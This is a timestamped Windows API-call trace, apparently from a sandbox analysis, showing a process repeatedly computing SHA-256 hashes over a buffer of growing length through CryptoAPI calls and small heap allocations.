	[0216.969] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.970] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.970] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0216.970] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735af0
	[0216.970] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735af0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735af0, pdwDataLen=0x1284a8) returned 1
	[0216.970] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.970] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.970] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.970] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.970] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0216.970] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735b18
	[0216.970] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735b18, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735b18, pdwDataLen=0x1284a8) returned 1
	[0216.970] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.970] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.970] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.971] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.971] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0216.971] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.971] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735b40
	[0216.971] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735b40, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735b40, pdwDataLen=0x1284a8) returned 1
	[0216.971] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.971] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.971] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.971] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.971] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0216.971] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.971] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735b68
	[0216.971] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735b68, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735b68, pdwDataLen=0x1284a8) returned 1
	[0216.971] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.971] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.971] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.972] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.972] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0216.972] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735b90
	[0216.972] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735b90, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735b90, pdwDataLen=0x1284a8) returned 1
	[0216.972] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.972] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.972] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.972] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.972] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0216.972] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735bb8
	[0216.972] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735bb8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735bb8, pdwDataLen=0x1284a8) returned 1
	[0216.972] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.972] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.973] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.973] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.973] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0216.973] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.973] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735be0
	[0216.973] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735be0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735be0, pdwDataLen=0x1284a8) returned 1
	[0216.973] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.973] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.973] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.973] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.973] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0216.973] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.974] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735c08
	[0216.974] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735c08, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735c08, pdwDataLen=0x1284a8) returned 1
	[0216.974] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.974] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.974] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.974] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.974] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0216.974] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.974] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735c30
	[0216.974] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735c30, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735c30, pdwDataLen=0x1284a8) returned 1
	[0216.974] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.974] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.974] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.974] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.975] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0216.975] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.975] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735c58
	[0216.975] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735c58, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735c58, pdwDataLen=0x1284a8) returned 1
	[0216.975] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.975] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.975] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.975] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.975] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0216.975] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.975] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735c80
	[0216.975] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735c80, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735c80, pdwDataLen=0x1284a8) returned 1
	[0216.975] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.975] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.975] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.976] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.976] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0216.976] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735ca8
	[0216.976] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735ca8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735ca8, pdwDataLen=0x1284a8) returned 1
	[0216.976] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.976] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.976] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.976] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.976] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0216.976] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735cd0
	[0216.976] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735cd0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735cd0, pdwDataLen=0x1284a8) returned 1
	[0216.976] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.976] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.976] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.977] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.977] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0216.977] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735cf8
	[0216.977] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735cf8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735cf8, pdwDataLen=0x1284a8) returned 1
	[0216.977] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.977] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.977] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.977] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.977] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0216.977] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735d20
	[0216.977] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735d20, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735d20, pdwDataLen=0x1284a8) returned 1
	[0216.977] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.977] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.977] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.978] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.978] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0216.978] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735d48
	[0216.978] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735d48, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735d48, pdwDataLen=0x1284a8) returned 1
	[0216.978] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.978] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.978] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.978] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.978] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0216.978] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735d70
	[0216.978] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735d70, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735d70, pdwDataLen=0x1284a8) returned 1
	[0216.978] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.978] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.978] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.979] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.979] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0216.979] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735d98
	[0216.979] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735d98, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735d98, pdwDataLen=0x1284a8) returned 1
	[0216.979] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.979] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.979] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.979] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.979] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0216.979] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735dc0
	[0216.979] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735dc0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735dc0, pdwDataLen=0x1284a8) returned 1
	[0216.979] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.979] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.979] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.980] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.980] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0216.980] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735de8
	[0216.980] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735de8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735de8, pdwDataLen=0x1284a8) returned 1
	[0216.980] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.980] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.980] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.980] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.980] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0216.980] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735e10
	[0216.980] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735e10, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735e10, pdwDataLen=0x1284a8) returned 1
	[0216.980] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.981] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.981] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.981] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.981] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0216.981] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735e38
	[0216.981] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735e38, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735e38, pdwDataLen=0x1284a8) returned 1
	[0216.981] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.981] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.981] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.981] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.981] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0216.982] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735e60
	[0216.982] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735e60, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735e60, pdwDataLen=0x1284a8) returned 1
	[0216.982] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.982] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.982] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.982] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.982] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0216.982] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735e88
	[0216.982] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735e88, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735e88, pdwDataLen=0x1284a8) returned 1
	[0216.982] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.982] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.982] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.983] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.983] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0216.983] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735eb0
